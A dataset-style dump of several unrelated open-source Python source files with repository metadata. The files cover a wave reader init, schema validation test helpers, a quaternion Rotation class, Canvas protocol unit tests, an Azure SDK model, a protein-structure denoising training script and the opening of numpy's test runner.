        self.node_set_prev(node, node)
| 30.637037
| 79
| 0.606141
|
4a04f65010da00ac99ce4e94458c045dadd7b2fe
| 67
|
py
|
Python
|
wave_reader/__init__.py
|
ztroop/wave-reader-utils
|
21b8fe941888e7ce5c4e3e04e87ee8cc9c2f0cbb
|
[
"MIT"
] | 11
|
2021-02-10T04:32:07.000Z
|
2021-12-29T04:17:06.000Z
|
wave_reader/__init__.py
|
ztroop/wave-reader
|
21b8fe941888e7ce5c4e3e04e87ee8cc9c2f0cbb
|
[
"MIT"
] | 12
|
2021-01-23T06:45:19.000Z
|
2021-12-29T04:20:53.000Z
|
wave_reader/__init__.py
|
ztroop/wave-reader
|
21b8fe941888e7ce5c4e3e04e87ee8cc9c2f0cbb
|
[
"MIT"
] | 5
|
2021-02-12T09:15:20.000Z
|
2021-09-13T05:05:40.000Z
|
from .wave import WaveDevice, discover_devices, scan # noqa: F401
| 33.5
| 66
| 0.776119
|
4a04f6ec396aba28080116ad7234bf4b4915ac5d
| 882
|
py
|
Python
|
tests/app/public_contracts/__init__.py
|
davidbgk/notification-api
|
0ede6a61b48289236d1873124965d2bc22a9b27b
|
[
"MIT"
] | null | null | null |
tests/app/public_contracts/__init__.py
|
davidbgk/notification-api
|
0ede6a61b48289236d1873124965d2bc22a9b27b
|
[
"MIT"
] | null | null | null |
tests/app/public_contracts/__init__.py
|
davidbgk/notification-api
|
0ede6a61b48289236d1873124965d2bc22a9b27b
|
[
"MIT"
] | null | null | null |
import os
from urllib.parse import urljoin
from urllib.request import pathname2url
from flask import json
import jsonschema
from jsonschema import Draft4Validator
def return_json_from_response(response):
    """Decode a Flask test-client response body into Python objects."""
    body = response.get_data(as_text=True)
    return json.loads(body)
def validate_v0(json_to_validate, schema_filename):
    """Validate a payload against one of the v0 contract schemas.

    :param json_to_validate: decoded JSON payload to check
    :param schema_filename: filename of a schema inside ``schemas/v0``
    :raises jsonschema.ValidationError: if the payload violates the schema
    """
    schema_dir = os.path.join(os.path.dirname(__file__), 'schemas', 'v0')
    # Build a file:// base URI so $ref links between schema files in the
    # same directory can be resolved.
    uri = urljoin('file:', pathname2url(schema_dir) + "/")
    resolver = jsonschema.RefResolver(uri, None)
    with open(os.path.join(schema_dir, schema_filename)) as schema:
        jsonschema.validate(
            json_to_validate,
            json.load(schema),
            format_checker=jsonschema.FormatChecker(),
            resolver=resolver
        )
def validate(json_to_validate, schema):
    """Validate *json_to_validate* against a Draft 4 JSON schema.

    Raises jsonschema.ValidationError on the first violation.
    """
    Draft4Validator(schema).validate(json_to_validate, schema)
| 29.4
| 73
| 0.725624
|
4a04f79d7db5eab098b0e7198581895dc07a8683
| 8,182
|
py
|
Python
|
simulation/aws-robomaker-sample-application-deepracer/simulation_ws/src/deepracer_simulation/scripts/rotation.py
|
Lacan82/deepracer
|
4503480cf80993f1e94cec8d26d783d6b2121cd8
|
[
"Apache-2.0"
] | 16
|
2019-12-24T06:46:31.000Z
|
2022-03-31T00:13:39.000Z
|
simulation/aws-robomaker-sample-application-deepracer/simulation_ws/src/deepracer_simulation/scripts/rotation.py
|
Lacan82/deepracer
|
4503480cf80993f1e94cec8d26d783d6b2121cd8
|
[
"Apache-2.0"
] | null | null | null |
simulation/aws-robomaker-sample-application-deepracer/simulation_ws/src/deepracer_simulation/scripts/rotation.py
|
Lacan82/deepracer
|
4503480cf80993f1e94cec8d26d783d6b2121cd8
|
[
"Apache-2.0"
] | 5
|
2020-02-11T22:13:07.000Z
|
2020-12-15T16:46:15.000Z
|
#!/usr/bin/env python
"""This code is taken from
https://github.com/scipy/scipy/blob/master/scipy/spatial/transform/rotation.py
because there is no python 3 implementation This is a stripped down version
intended to be used by deepracer only.
"""
import re
import numpy as np
import scipy.linalg
_AXIS_TO_IND = {'x': 0, 'y': 1, 'z': 2}
def _compose_quat(p, q):
    """Hamilton product of two (N, 4) quaternion arrays, scalar-last.

    A length-1 array broadcasts against a length-N one.
    """
    n_out = max(p.shape[0], q.shape[0])
    out = np.empty((n_out, 4))
    p_vec, p_w = p[:, :3], p[:, 3]
    q_vec, q_w = q[:, :3], q[:, 3]
    # Scalar part: w1*w2 - <v1, v2>
    out[:, 3] = p_w * q_w - np.sum(p_vec * q_vec, axis=1)
    # Vector part: w1*v2 + w2*v1 + v1 x v2
    out[:, :3] = (p_w[:, None] * q_vec + q_w[:, None] * p_vec
                  + np.cross(p_vec, q_vec))
    return out
def _make_elementary_quat(axis, angles):
    """Unit quaternions (x, y, z, w) rotating by *angles* radians about the
    single axis named by *axis* ('x', 'y' or 'z')."""
    half = angles / 2
    out = np.zeros((angles.shape[0], 4))
    out[:, 3] = np.cos(half)
    out[:, _AXIS_TO_IND[axis]] = np.sin(half)
    return out
def _elementary_quat_compose(seq, angles, intrinsic=False):
    """Fold per-axis elementary rotations into one quaternion array.

    Intrinsic sequences apply each new rotation in the body frame
    (right-composition); extrinsic sequences in the fixed frame
    (left-composition).
    """
    acc = _make_elementary_quat(seq[0], angles[:, 0])
    for col, axis in enumerate(seq[1:], start=1):
        step = _make_elementary_quat(axis, angles[:, col])
        if intrinsic:
            acc = _compose_quat(acc, step)
        else:
            acc = _compose_quat(step, acc)
    return acc
class Rotation(object):
    """One or more 3D rotations stored as unit quaternions.

    Quaternions use scalar-last (x, y, z, w) ordering, matching
    ``scipy.spatial.transform.Rotation``.
    """

    def __init__(self, quat, normalized=False, copy=True):
        """Initialize from quaternion(s).

        :param quat: array_like of shape (4,) or (N, 4), scalar-last.
        :param normalized: if True, `quat` is trusted to have unit norm
            and is not re-normalized.
        :param copy: if False (and `normalized` is True), store `quat`
            without copying.
        :raises ValueError: on a bad shape or a zero-norm quaternion.
        """
        self._single = False
        quat = np.asarray(quat, dtype=float)

        if quat.ndim not in [1, 2] or quat.shape[-1] != 4:
            raise ValueError("Expected `quat` to have shape (4,) or (N x 4), "
                             "got {}.".format(quat.shape))

        # If a single quaternion is given, convert it to a 2D 1 x 4 matrix but
        # set self._single to True so that we can return appropriate objects
        # in the `to_...` methods
        if quat.shape == (4,):
            quat = quat[None, :]
            self._single = True

        if normalized:
            self._quat = quat.copy() if copy else quat
        else:
            self._quat = quat.copy()
            norms = scipy.linalg.norm(quat, axis=1)

            zero_norms = norms == 0
            if zero_norms.any():
                raise ValueError("Found zero norm quaternions in `quat`.")

            # Ensure norm is broadcasted along each column.
            self._quat[~zero_norms] /= norms[~zero_norms][:, None]

    def __len__(self):
        """Number of rotations contained in this object.

        Multiple rotations can be stored in a single instance.

        Returns
        -------
        length : int
            Number of rotations stored in object.
        """
        return self._quat.shape[0]

    @classmethod
    def from_euler(cls, seq, angles, degrees=False):
        """Initialize from Euler angles.

        Parameters
        ----------
        seq : string
            Up to 3 characters from {'X', 'Y', 'Z'} for intrinsic rotations,
            or {'x', 'y', 'z'} for extrinsic rotations. Intrinsic and
            extrinsic axes cannot be mixed in one call.
        angles : float or array_like, shape (N,) or (N, [1 or 2 or 3])
            Euler angles in radians (`degrees` is False) or degrees
            (`degrees` is True). The trailing dimension (if any) must match
            the width of `seq`.
        degrees : bool, optional
            If True, the given angles are assumed to be in degrees.
            Default is False.

        Returns
        -------
        rotation : `Rotation` instance
            Rotation represented by the sequence of rotations around given
            axes with given angles.
        """
        num_axes = len(seq)
        if num_axes < 1 or num_axes > 3:
            raise ValueError("Expected axis specification to be a non-empty "
                             "string of upto 3 characters, got {}".format(seq))

        intrinsic = (re.match(r'^[XYZ]{1,3}$', seq) is not None)
        extrinsic = (re.match(r'^[xyz]{1,3}$', seq) is not None)
        if not (intrinsic or extrinsic):
            raise ValueError("Expected axes from `seq` to be from ['x', 'y', "
                             "'z'] or ['X', 'Y', 'Z'], got {}".format(seq))

        if any(seq[i] == seq[i+1] for i in range(num_axes - 1)):
            raise ValueError("Expected consecutive axes to be different, "
                             "got {}".format(seq))

        seq = seq.lower()

        angles = np.asarray(angles, dtype=float)
        if degrees:
            angles = np.deg2rad(angles)

        is_single = False
        # Prepare angles to have shape (num_rot, num_axes)
        if num_axes == 1:
            if angles.ndim == 0:
                # (1, 1)
                angles = angles.reshape((1, 1))
                is_single = True
            elif angles.ndim == 1:
                # (N, 1)
                angles = angles[:, None]
            elif angles.ndim == 2 and angles.shape[-1] != 1:
                raise ValueError("Expected `angles` parameter to have shape "
                                 "(N, 1), got {}.".format(angles.shape))
            elif angles.ndim > 2:
                raise ValueError("Expected float, 1D array, or 2D array for "
                                 "parameter `angles` corresponding to `seq`, "
                                 "got shape {}.".format(angles.shape))
        else:  # 2 or 3 axes
            if angles.ndim not in [1, 2] or angles.shape[-1] != num_axes:
                raise ValueError("Expected `angles` to be at most "
                                 "2-dimensional with width equal to number "
                                 "of axes specified, got {} for shape".format(angles.shape))

            if angles.ndim == 1:
                # (1, num_axes)
                angles = angles[None, :]
                is_single = True

        # By now angles should have shape (num_rot, num_axes)
        # sanity check
        if angles.ndim != 2 or angles.shape[-1] != num_axes:
            raise ValueError("Expected angles to have shape (num_rotations, "
                             "num_axes), got {}.".format(angles.shape))

        quat = _elementary_quat_compose(seq, angles, intrinsic)
        return cls(quat[0] if is_single else quat, normalized=True, copy=False)

    def as_quat(self):
        """Represent as quaternions.

        The mapping from quaternions to rotations is two-to-one: ``q`` and
        ``-q`` represent the same spatial rotation.

        Returns
        -------
        quat : `numpy.ndarray`, shape (4,) or (N, 4)
            Shape depends on shape of inputs used for initialization.
        """
        if self._single:
            return self._quat[0].copy()
        else:
            # Bug fix: the original returned `self._quat.copy` (the bound
            # method object) instead of calling it, so batched rotations
            # yielded a method, not an array.
            return self._quat.copy()
| 41.744898
| 92
| 0.551577
|
4a04f7fb55def05222c21af8e257039e75e96ed6
| 5,388
|
py
|
Python
|
canvas_workflow_helpers/tests/test_appointment_task_creator.py
|
canvas-medical/open-source-sdk
|
a7a17f1950f63c59646037358c9a437dbd827413
|
[
"Apache-2.0"
] | 12
|
2022-02-25T18:15:43.000Z
|
2022-03-30T18:43:02.000Z
|
canvas_workflow_helpers/tests/test_appointment_task_creator.py
|
canvas-medical/open-source-sdk
|
a7a17f1950f63c59646037358c9a437dbd827413
|
[
"Apache-2.0"
] | 1
|
2022-03-18T22:21:03.000Z
|
2022-03-18T22:22:36.000Z
|
canvas_workflow_helpers/tests/test_appointment_task_creator.py
|
canvas-medical/open-source-sdk
|
a7a17f1950f63c59646037358c9a437dbd827413
|
[
"Apache-2.0"
] | 4
|
2022-02-25T18:15:33.000Z
|
2022-02-25T19:14:17.000Z
|
from pathlib import Path
from canvas_workflow_kit.constants import CHANGE_TYPE
from canvas_workflow_kit.utils import parse_class_from_python_source
from .base import WorkflowHelpersBaseTest
from canvas_workflow_kit import events
from canvas_workflow_kit.protocol import (ProtocolResult,
STATUS_NOT_APPLICABLE)
class AppointmentTaskCreatorTest(WorkflowHelpersBaseTest):
    """Unit tests for the AppointmentTaskCreator protocol.

    The protocol class is parsed from its python source template and
    exercised against two mock patients: one with upcoming appointments
    and one without.
    """

    def setUp(self):
        super().setUp()
        currentDir = Path(__file__).parent.resolve()
        self.mocks_path = f'{currentDir}/mock_data/'
        patient_has_appointments = self.load_patient(
            'patient_appointments/patient_has_appointments')
        patient_no_appointments = self.load_patient(
            'patient_appointments/patient_no_appointments')
        self.appointment_class = self.createProtocolClass()(
            patient=patient_has_appointments)
        self.no_appointment_class = self.createProtocolClass()(
            patient=patient_no_appointments)

    def createProtocolClass(self):
        # Load the protocol implementation from its source template so the
        # tests always exercise the checked-in version.
        template_path = Path(
            __file__).parent.parent / 'protocols/appointment_task_creator.py'
        template = template_path.open('r').read()
        return parse_class_from_python_source(template)

    def test_fields(self):
        # The protocol metadata must match the published values exactly.
        Protocol = self.appointment_class
        self.assertEqual(
            'Listens for appointment creates and generates a task.',
            Protocol._meta.description)
        self.assertEqual('Appointment Task Creator', Protocol._meta.title)
        self.assertEqual('v1.0.0', Protocol._meta.version)
        self.assertEqual('https://canvasmedical.com/',
                         Protocol._meta.information)
        self.assertEqual(['AppointmentTaskCreator'],
                         Protocol._meta.identifiers)
        self.assertEqual(['Task'], Protocol._meta.types)
        self.assertEqual([events.HEALTH_MAINTENANCE],
                         Protocol._meta.responds_to_event_types)
        self.assertEqual([CHANGE_TYPE.APPOINTMENT],
                         Protocol._meta.compute_on_change_types)
        self.assertEqual(['Canvas Medical'], Protocol._meta.authors)
        self.assertEqual(['Canvas Medical'], Protocol._meta.references)
        self.assertEqual('', Protocol._meta.funding_source)

    def test_appointment_class_result(self):
        # Outside an appointment-create event the protocol is not applicable,
        # even for a patient with appointments.
        tested = self.appointment_class
        result = tested.compute_results()
        self.assertIsInstance(result, ProtocolResult)
        self.assertEqual(STATUS_NOT_APPLICABLE, result.status)
        self.assertEqual([], result.recommendations)
        self.assertEqual('', result.narrative)
        self.assertIsNone(result.due_in)
        self.assertEqual(30, result.days_of_notice)
        self.assertIsNone(result.next_review)

    def test_no_appointment_class_result(self):
        # Same not-applicable outcome for the patient without appointments.
        tested = self.no_appointment_class
        result = tested.compute_results()
        self.assertIsInstance(result, ProtocolResult)
        self.assertEqual(STATUS_NOT_APPLICABLE, result.status)
        self.assertEqual([], result.recommendations)
        self.assertEqual('', result.narrative)
        self.assertIsNone(result.due_in)
        self.assertEqual(30, result.days_of_notice)
        self.assertIsNone(result.next_review)

    def test_get_record_by_id(self):
        # get_record_by_id returns {} for None input or an unknown id, and
        # the full note record when the id is present.
        tested_no_appointments = self.no_appointment_class
        test_appointments = self.appointment_class
        empty_given_none = tested_no_appointments.get_record_by_id(None, None)
        no_error_given_id = tested_no_appointments.get_record_by_id(
            tested_no_appointments.patient.upcoming_appointment_notes, 11)
        not_empty_given_appointment = test_appointments.get_record_by_id(
            test_appointments.patient.upcoming_appointment_notes, 6)
        self.assertEqual({}, empty_given_none)
        self.assertEqual({}, no_error_given_id)
        self.assertEqual(
            not_empty_given_appointment, {
                "id":
                6,
                "isLocked":
                False,
                "stateHistory": [{
                    "id": 11,
                    "state": "SCH"
                }, {
                    "id": 12,
                    "state": "BKD"
                }],
                "providerDisplay": {
                    "firstName": "Sam",
                    "lastName": "Tregar",
                    "key": "bb24f084e1fa46c7931663259540266d"
                },
                "location": {
                    "id": 1,
                    "fullName": "Canvas Clinic San Francisco"
                },
                "appointments": [5],
                "currentAppointmentId":
                5
            })

    def test_get_new_field_value(self):
        tested_no_appointments = self.no_appointment_class
        none_given_none = tested_no_appointments.get_new_field_value(None)
        self.assertIsNone(none_given_none)

    def test_is_appointment_and_created(self):
        tested_no_appointments = self.no_appointment_class
        no_appointments = tested_no_appointments.is_appointment_and_created()
        self.assertEqual(False, no_appointments)

    def test_find_provider_key(self):
        tested_no_appointments = self.no_appointment_class
        no_expected_provider = tested_no_appointments.find_provider_key()
        self.assertIsNone(no_expected_provider)
| 40.208955
| 78
| 0.649963
|
4a04f7fd025984c30bd5191bf411ec6afd01e616
| 1,603
|
py
|
Python
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/troubleshooting_result_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/troubleshooting_result_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 54
|
2016-03-25T17:25:01.000Z
|
2018-10-22T17:27:54.000Z
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/troubleshooting_result_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2017-01-20T18:25:46.000Z
|
2017-05-12T21:31:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TroubleshootingResult(Model):
    """Troubleshooting information gained from specified resource.

    :param start_time: The start time of the troubleshooting.
    :type start_time: datetime
    :param end_time: The end time of the troubleshooting.
    :type end_time: datetime
    :param code: The result code of the troubleshooting.
    :type code: str
    :param results: Information from troubleshooting.
    :type results:
     list[~azure.mgmt.network.v2018_01_01.models.TroubleshootingDetails]
    """

    # Maps each attribute to its wire name and msrest (de)serialization type.
    _attribute_map = {
        'start_time': {'key': 'startTime', 'type': 'iso-8601'},
        'end_time': {'key': 'endTime', 'type': 'iso-8601'},
        'code': {'key': 'code', 'type': 'str'},
        'results': {'key': 'results', 'type': '[TroubleshootingDetails]'},
    }

    def __init__(self, *, start_time=None, end_time=None, code: str=None, results=None, **kwargs) -> None:
        super(TroubleshootingResult, self).__init__(**kwargs)
        self.start_time = start_time
        self.end_time = end_time
        self.code = code
        self.results = results
| 38.166667
| 106
| 0.616968
|
4a04f81a79214195858f0482c5a90c62f0fc1253
| 9,966
|
py
|
Python
|
examples/train_lightning.py
|
blazingsiyan/geometric-vector-perceptron
|
eee1ee8e71148cfdb3e02b660d80f12cf1cecd0a
|
[
"MIT"
] | null | null | null |
examples/train_lightning.py
|
blazingsiyan/geometric-vector-perceptron
|
eee1ee8e71148cfdb3e02b660d80f12cf1cecd0a
|
[
"MIT"
] | null | null | null |
examples/train_lightning.py
|
blazingsiyan/geometric-vector-perceptron
|
eee1ee8e71148cfdb3e02b660d80f12cf1cecd0a
|
[
"MIT"
] | null | null | null |
import gc
from argparse import ArgumentParser
from functools import partial
from pathlib import Path
from pprint import pprint
import matplotlib.pyplot as plt
import numpy as np
import pytorch_lightning as pl
import torch
from einops import rearrange
from loguru import logger
from pytorch_lightning.callbacks import (
GPUStatsMonitor,
LearningRateMonitor,
ModelCheckpoint,
ProgressBar,
)
from pytorch_lightning.loggers import TensorBoardLogger
from examples.data_handler import kabsch_torch, scn_cloud_mask
from examples.data_utils import (
encode_whole_bonds,
encode_whole_protein,
from_encode_to_pred,
prot_covalent_bond,
)
from examples.scn_data_module import ScnDataModule
from geometric_vector_perceptron.geometric_vector_perceptron import GVP_Network
class StructureModel(pl.LightningModule):
@staticmethod
def add_model_specific_args(parent_parser):
# model
parser = ArgumentParser(parents=[parent_parser], add_help=False)
parser.add_argument("--depth", type=int, default=4)
parser.add_argument("--cutoffs", type=float, default=1.0)
parser.add_argument("--noise", type=float, default=1.0)
# optimizer & scheduler
parser.add_argument("--init_lr", type=float, default=1e-3)
return parser
def __init__(
self,
depth: int = 1,
cutoffs: float = 1.0,
noise: float = 1.0,
init_lr: float = 1e-3,
**kwargs,
):
super().__init__()
self.save_hyperparameters()
self.model = GVP_Network(
n_layers=depth,
feats_x_in=48,
vectors_x_in=7,
feats_x_out=48,
vectors_x_out=7,
feats_edge_in=4,
vectors_edge_in=1,
feats_edge_out=4,
vectors_edge_out=1,
embedding_nums=[36, 20],
embedding_dims=[16, 16],
edge_embedding_nums=[2],
edge_embedding_dims=[2],
residual=True,
)
self.needed_info = {
"cutoffs": [cutoffs],
"bond_scales": [1],
"aa_pos_scales": [1, 2, 4, 8, 16, 32, 64, 128],
"atom_pos_scales": [1, 2, 4, 8, 16, 32],
"dist2ca_norm_scales": [1, 2, 4],
"bb_norms_atoms": [0.5], # will encode 3 vectors with this
}
self.noise = noise
self.init_lr = init_lr
self.baseline_losses = []
self.epoch_losses = []
def forward(self, seq, true_coords, angles, padding_seq, mask):
needed_info = self.needed_info
device = true_coords.device
needed_info["seq"] = seq[: (-padding_seq) or None]
needed_info["covalent_bond"] = prot_covalent_bond(needed_info["seq"])
pre_target = encode_whole_protein(
seq,
true_coords,
angles,
padding_seq,
needed_info=needed_info,
free_mem=True,
)
pre_target_x, _, _, embedd_info = pre_target
encoded = encode_whole_protein(
seq,
true_coords + self.noise * torch.randn_like(true_coords),
angles,
padding_seq,
needed_info=needed_info,
free_mem=True,
)
x, edge_index, edge_attrs, embedd_info = encoded
batch = torch.tensor([0 for i in range(x.shape[0])], device=x.device).long()
# add position coords
cloud_mask = scn_cloud_mask(seq[: (-padding_seq) or None]).to(device)
# cloud is all points, chain is all for which we have labels
chain_mask = mask[: (-padding_seq) or None].unsqueeze(-1) * cloud_mask
flat_chain_mask = rearrange(chain_mask.bool(), "l c -> (l c)")
cloud_mask = cloud_mask.bool()
flat_cloud_mask = rearrange(cloud_mask, "l c -> (l c)")
recalc_edge = partial(
encode_whole_bonds,
x_format="encode",
embedd_info=embedd_info,
needed_info=needed_info,
free_mem=True,
)
# predict
scores = self.model.forward(
x,
edge_index,
batch=batch,
edge_attr=edge_attrs,
recalc_edge=recalc_edge,
verbose=False,
)
# format pred, baseline and target
target = from_encode_to_pred(
pre_target_x, embedd_info=embedd_info, needed_info=needed_info
)
pred = from_encode_to_pred(
scores, embedd_info=embedd_info, needed_info=needed_info
)
base = from_encode_to_pred(x, embedd_info=embedd_info, needed_info=needed_info)
# MEASURE ERROR
# option 1: loss is MSE on output tokens
# loss_ = (target-pred)**2
# loss = loss_.mean()
# option 2: loss is RMSD on reconstructed coords
target_coords = target[:, 3:4] * target[:, :3]
pred_coords = pred[:, 3:4] * pred[:, :3]
base_coords = base[:, 3:4] * base[:, :3]
## align - sometimes svc fails - idk why
try:
pred_aligned, target_aligned = kabsch_torch(
pred_coords.t(), target_coords.t()
) # (3, N)
loss = (
(pred_aligned.t() - target_aligned.t())[
flat_chain_mask[flat_cloud_mask]
]
** 2
).mean() ** 0.5
except:
pred_aligned, target_aligned = None, None
print("svd failed convergence, ep:")
loss = None
# loss = ((pred_coords.t() - target_coords.t())[flat_chain_mask[flat_cloud_mask]] ** 2).mean() ** 0.5
# measure error
loss_base = (
(base_coords - target_coords)[flat_chain_mask[flat_cloud_mask]] ** 2
).mean() ** 0.5
del true_coords, angles, pre_target_x, edge_index, edge_attrs
del scores, target_coords, pred_coords, base_coords
del encoded, pre_target, target_aligned, pred_aligned
gc.collect()
# return loss
return {"loss": loss, "loss_base": loss_base}
def configure_optimizers(self):
    """Create the Adam optimizer over all model parameters at ``init_lr``."""
    return torch.optim.Adam(self.parameters(), lr=self.init_lr)
def on_train_start(self) -> None:
    """Reset the per-run loss accumulators before training begins."""
    self.baseline_losses, self.epoch_losses = [], []
def training_step(self, batch, batch_idx):
    """Run one training step; return the loss, or None to skip the batch."""
    result = self.forward(**batch)
    step_loss = result["loss"]
    base_loss = result["loss_base"]
    # forward() returns loss=None when the Kabsch SVD fails to converge, and
    # a NaN loss can slip through a bad alignment — skip the batch either way.
    if step_loss is None or torch.isnan(step_loss):
        return None
    self.epoch_losses.append(step_loss.item())
    self.baseline_losses.append(base_loss.item())
    self.log("train_loss", step_loss, on_epoch=True, prog_bar=True)
    self.log("train_loss_base", result["loss_base"], on_epoch=True, prog_bar=False)
    return step_loss
def on_train_end(self) -> None:
# Plot the per-batch training RMSD, several moving-average curves, and the
# constant baseline error, then save the figure to loss.pdf.
plt.figure(figsize=(15, 6))
plt.title(
f"Loss Evolution - Denoising of Gaussian-masked Coordinates (mu=0, sigma={self.noise})"
)
plt.plot(self.epoch_losses, label="train loss step")
# For each window size: a cumulative mean over the warm-up prefix (fewer
# than `window` points available) followed by a sliding-window mean.
for window in [8, 16, 32]:
plt.plot(
[
np.mean(self.epoch_losses[:window][0 : i + 1])
for i in range(min(window, len(self.epoch_losses)))
]
+ [
np.mean(self.epoch_losses[i : i + window + 1])
for i in range(len(self.epoch_losses) - window)
],
label="Window mean n={0}".format(window),
)
# Horizontal dashed line: mean RMSD of the unmodified (noisy) input coords.
plt.plot(
np.ones(len(self.epoch_losses)) * np.mean(self.baseline_losses),
"k--",
label="Baseline",
)
plt.xlim(-0.01 * len(self.epoch_losses), 1.01 * len(self.epoch_losses))
plt.ylabel("RMSD")
plt.xlabel("Batch number")
plt.legend()
plt.savefig("loss.pdf")
def validation_step(self, batch, batch_idx):
    """Log the validation loss and the no-learning baseline for one batch."""
    metrics = self.forward(**batch)
    for name, key in (("val_loss", "loss"), ("val_loss_base", "loss_base")):
        self.log(name, metrics[key], on_epoch=True, sync_dist=True)
def test_step(self, batch, batch_idx):
output = self.forward(**batch)
self.log("test_loss", output["loss"], on_epoch=True, sync_dist=True)
self.log("test_loss_base", output["loss_base"], on_epoch=True, sync_dist=True)
def get_trainer(args):
"""Build a pl.Trainer from parsed CLI args, wired with a TensorBoard logger
and checkpoint / LR-monitor / progress-bar / GPU-stats callbacks."""
pl.seed_everything(args.seed)
# loggers
root_dir = Path(args.default_root_dir).expanduser().resolve()
root_dir.mkdir(parents=True, exist_ok=True)
tb_save_dir = root_dir / "tb"
tb_logger = TensorBoardLogger(save_dir=tb_save_dir)
loggers = [tb_logger]
logger.info(f"Run tensorboard --logdir {tb_save_dir}")
# callbacks
# NOTE(review): ModelCheckpoint is created with defaults (no monitored
# metric), so it presumably keeps only the most recent checkpoint — confirm.
ckpt_cb = ModelCheckpoint(verbose=True)
lr_cb = LearningRateMonitor(logging_interval="step")
pb_cb = ProgressBar(refresh_rate=args.progress_bar_refresh_rate)
callbacks = [lr_cb, pb_cb]
callbacks.append(ckpt_cb)
gpu_cb = GPUStatsMonitor()
callbacks.append(gpu_cb)
plugins = []
# Remaining trainer options (gpus, max_epochs, ...) come straight from argv.
trainer = pl.Trainer.from_argparse_args(
args, logger=loggers, callbacks=callbacks, plugins=plugins
)
return trainer
def main(args):
"""Train StructureModel on the SCN datamodule, then evaluate the test split."""
dm = ScnDataModule(**vars(args))
model = StructureModel(**vars(args))
trainer = get_trainer(args)
trainer.fit(model, datamodule=dm)
# trainer.test returns a list of metric dicts, echoed for the console log
metrics = trainer.test(model, datamodule=dm)
print("test", metrics)
# CLI entry point: compose argparse options from the model, the datamodule
# and pl.Trainer, then launch training.
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--seed", type=int, default=23333, help="Seed everything.")
# add model specific args
parser = StructureModel.add_model_specific_args(parser)
# add data specific args
parser = ScnDataModule.add_data_specific_args(parser)
# add trainer args
parser = pl.Trainer.add_argparse_args(parser)
args = parser.parse_args()
# echo the full parsed configuration for reproducibility
pprint(vars(args))
main(args)
| 31.438486
| 113
| 0.602047
|
4a04f956395a2e0ac97247a117cae7eb64c0c9e6
| 18,292
|
py
|
Python
|
runtests.py
|
farziengineer/numpy
|
4ff3af387f93ff37f04f42458d4590c33f61fb9e
|
[
"BSD-3-Clause"
] | null | null | null |
runtests.py
|
farziengineer/numpy
|
4ff3af387f93ff37f04f42458d4590c33f61fb9e
|
[
"BSD-3-Clause"
] | null | null | null |
runtests.py
|
farziengineer/numpy
|
4ff3af387f93ff37f04f42458d4590c33f61fb9e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""
runtests.py [OPTIONS] [-- ARGS]
Run tests, building the project first.
Examples::
$ python runtests.py
$ python runtests.py -s {SAMPLE_SUBMODULE}
$ python runtests.py -t {SAMPLE_TEST}
$ python runtests.py --ipython
$ python runtests.py --python somescript.py
$ python runtests.py --bench
$ python runtests.py --durations 20
Run a debugger:
$ gdb --args python runtests.py [...other args...]
Generate C code coverage listing under build/lcov/:
(requires http://ltp.sourceforge.net/coverage/lcov.php)
$ python runtests.py --gcov [...other args...]
$ python runtests.py --lcov-html
"""
from __future__ import division, print_function
#
# This is a generic test runner script for projects using NumPy's test
# framework. Change the following values to adapt to your project:
#
PROJECT_MODULE = "numpy"
PROJECT_ROOT_FILES = ['numpy', 'LICENSE.txt', 'setup.py']
SAMPLE_TEST = "numpy/linalg/tests/test_linalg.py::test_byteorder_check"
SAMPLE_SUBMODULE = "linalg"
EXTRA_PATH = ['/usr/lib/ccache', '/usr/lib/f90cache',
'/usr/local/lib/ccache', '/usr/local/lib/f90cache']
# ---------------------------------------------------------------------
if __doc__ is None:
__doc__ = "Run without -OO if you want usage info"
else:
__doc__ = __doc__.format(**globals())
import sys
import os
# In case we are run from the source directory, we don't want to import the
# project from there:
sys.path.pop(0)
import shutil
import subprocess
import time
from argparse import ArgumentParser, REMAINDER
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__)))
def main(argv):
    """Parse command-line options, optionally build the project, then run
    tests, benchmarks, a shell/REPL, or coverage tooling as requested.

    Always terminates via sys.exit()/os.execv(); never returns normally.
    """
    parser = ArgumentParser(usage=__doc__.lstrip())
    parser.add_argument("--verbose", "-v", action="count", default=1,
                        help="more verbosity")
    parser.add_argument("--debug-configure", action="store_true",
                        help=("add -v to build_src to show compiler "
                              "configuration output while creating "
                              "_numpyconfig.h and config.h"))
    parser.add_argument("--no-build", "-n", action="store_true", default=False,
                        help="do not build the project (use system installed version)")
    parser.add_argument("--build-only", "-b", action="store_true", default=False,
                        help="just build, do not run any tests")
    parser.add_argument("--doctests", action="store_true", default=False,
                        help="Run doctests in module")
    parser.add_argument("--refguide-check", action="store_true", default=False,
                        help="Run refguide (doctest) check (do not run regular tests.)")
    parser.add_argument("--coverage", action="store_true", default=False,
                        help=("report coverage of project code. HTML output goes "
                              "under build/coverage"))
    parser.add_argument("--durations", action="store", default=-1, type=int,
                        help=("Time N slowest tests, time all if 0, time none if < 0"))
    parser.add_argument("--gcov", action="store_true", default=False,
                        help=("enable C code coverage via gcov (requires GCC). "
                              "gcov output goes to build/**/*.gc*"))
    parser.add_argument("--lcov-html", action="store_true", default=False,
                        help=("produce HTML for C code coverage information "
                              "from a previous run with --gcov. "
                              "HTML output goes to build/lcov/"))
    parser.add_argument("--mode", "-m", default="fast",
                        help="'fast', 'full', or something that could be "
                             "passed to nosetests -A [default: fast]")
    parser.add_argument("--submodule", "-s", default=None,
